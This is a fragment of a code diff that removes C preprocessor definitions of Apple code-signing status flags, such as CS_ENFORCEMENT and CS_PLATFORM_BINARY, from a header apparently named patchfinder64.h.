CS_CHECK_EXPIRATION 0x0000400 /* force expiration checking */ -#define CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */ -#define CS_ENFORCEMENT 0x0001000 /* require enforcement */ -#define CS_REQUIRE_LV 0x0002000 /* require library validation */ -#define CS_ENTITLEMENTS_VALIDATED 0x0004000 - -#define CS_ALLOWED_MACHO 0x00ffffe - -#define CS_EXEC_SET_HARD 0x0100000 /* set CS_HARD on any exec'ed process */ -#define CS_EXEC_SET_KILL 0x0200000 /* set CS_KILL on any exec'ed process */ -#define CS_EXEC_SET_ENFORCEMENT 0x0400000 /* set CS_ENFORCEMENT on any exec'ed process */ -#define CS_EXEC_SET_INSTALLER 0x0800000 /* set CS_INSTALLER on any exec'ed process */ - -#define CS_KILLED 0x1000000 /* was killed by kernel for invalidity */ -#define CS_DYLD_PLATFORM 0x2000000 /* dyld used to load this is a platform binary */ -#define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */ -#define CS_PLATFORM_PATH 0x8000000 /* platform binary by the fact of path (osx only) */ -#endif /* patchfinder64_h */